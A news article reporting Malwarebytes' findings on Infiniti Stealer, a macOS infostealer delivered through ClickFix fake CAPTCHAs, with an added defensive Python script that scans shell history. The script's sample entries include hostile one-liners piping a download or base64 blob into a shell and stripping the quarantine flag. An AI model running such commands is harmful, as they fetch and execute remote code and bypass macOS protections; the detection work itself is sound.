
- Malwarebytes uncovers Infiniti Stealer targeting macOS via ClickFix social engineering
- Victims tricked into running malicious Terminal code, bypassing traditional defenses
- Stealer compiled with Nuitka, exfiltrates browser credentials, Keychain data, wallets, and screenshots
macOS devices are being increasingly targeted with malware, as security researchers discover yet another infostealer variant in the wild.
Malwarebytes published an in-depth report on a piece of malware called Infiniti Stealer, which was apparently compiled in a rather unusual fashion.
Infiniti Stealer is apparently distributed via a ClickFix social engineering attack. A ClickFix attack tricks the victim by presenting a “problem” and, at the same time, offering a “solution”. In this case, Malwarebytes says the victims are being redirected to update-check[.]com (most likely through phishing emails claiming certain software needs updating in order to work properly) where they are shown a benign-looking CAPTCHA.
Compiled with Nuitka
Besides the usual “I am not a robot” checkbox, the CAPTCHA has an additional step (which should also serve as a major red flag): to open Spotlight (the built-in search tool), run Terminal, and paste the given code. This code runs a dropper which, in turn, delivers Infiniti Stealer.
“Because the user runs the command directly, many traditional defenses are bypassed,” Malwarebytes explained. “There’s no exploit, no malicious attachment, and no drive‑by download.”
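As an added illustration on the defender side (not code from the Malwarebytes report), here is a small Python script that scans a macOS shell history for the kind of pasted one-liner a ClickFix page asks for: a download or decode step piped straight into a shell, or a quarantine flag being stripped. The detection patterns, rule names and sample history entries are assumptions constructed for this example, not indicators from the report.

```python
import re
from typing import Dict, List

# Heuristics for ClickFix-style pasted commands. These are assumptions about
# what such one-liners commonly look like, not indicators from the report.
SUSPICIOUS_PATTERNS = {
    # curl/wget output piped directly into a shell interpreter
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # base64-decoded blob piped into a shell interpreter
    "base64_decode_piped_to_shell": re.compile(
        r"base64\s+(-d|-D|--decode)[^|]*\|\s*(ba|z)?sh\b"),
    # removal of the Gatekeeper quarantine attribute
    "quarantine_flag_removed": re.compile(
        r"xattr\s+(-d|-r\s+-d|-rd)\s+com\.apple\.quarantine"),
    # eval of a command substitution (decoded or downloaded payload)
    "eval_of_substitution": re.compile(r"\beval\b.*\$\("),
}

# zsh extended history format: ": <timestamp>:<duration>;<command>"
ZSH_HISTORY = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")


def parse_history_line(line: str) -> str:
    """Return the command from a zsh extended-history line, or the line as-is (bash_history)."""
    m = ZSH_HISTORY.match(line)
    return m.group("cmd") if m else line


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per (line, rule) match; a clean history yields an empty list."""
    findings: List[Dict[str, object]] = []
    for n, raw in enumerate(lines, 1):
        cmd = parse_history_line(raw.rstrip("\n"))
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append({"line": n, "rule": rule, "command": cmd})
    return findings


# Constructed sample history (mix of zsh and bash formats); the URL is a placeholder.
SAMPLE_HISTORY = [
    ": 1700000000:0;ls -la ~/Downloads",
    ": 1700000100:0;brew update && brew upgrade",
    ": 1700000200:0;curl -fsSL http://update-check.invalid/verify | bash",
    ": 1700000300:0;echo 'aGVsbG8=' | base64 -d | sh",
    "git status",
    "xattr -d com.apple.quarantine ~/Downloads/Installer.app",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['rule']}: {f['command']}")
```

In practice you would feed it `~/.zsh_history` (macOS's default shell since Catalina) and treat a hit as a trigger to review the host, since the command itself was typed by a legitimate user session and will not appear as a download or attachment.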
What makes this malware stand out is the fact that it is written in Python, but compiled with Nuitka, a compiler that converts Python code into standalone executables or optimized binaries.
The resulting product is a native macOS binary which, according to the researchers, makes it harder to analyze and detect compared to your typical off-the-shelf Python-based malware.
“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer,” Malwarebytes said.
An infostealer is a malware variant designed to exfiltrate sensitive data from target devices. Usually delivered through social engineering, infostealers get installed through droppers and try to upload various types of information to an attacker-controlled server, including browser data (cookies, stored passwords, cryptocurrency wallet plugins, etc.), passwords, sensitive files (.docx, .txt, .pdf, and other formats), and other files deemed of value.
Depending on the type of malware, they may try to upload more or less data, and come with different obfuscation and persistence mechanisms.
Infiniti is capable of stealing a wide range of sensitive data. Primarily, it hunts for credentials from Chromium-based browsers, as well as Firefox. It can exfiltrate macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in developer files such as .env. Finally, it will also exfiltrate screenshots captured during execution.
How to stay safe from phishing and infostealers
Social engineering is a popular scam tactic, and phishing emails continue to be the biggest attack vector out there. To avoid falling prey to these campaigns, exercise caution and a high level of skepticism towards any and all incoming communications, be it email, instant messaging, or phone. Double-check all links shared in the email, and hunt for typos, letters replaced by numbers, and otherwise suspicious variations of known domains. (For example, microsoft is often spelled with an “RN” instead of “M” in phishing emails - rnicrosoft - making it almost indistinguishable.)
Be careful when downloading attachments (especially when receiving an unexpected message) and make sure you’re running phishing-proof multi-factor authentication.
Via BleepingComputer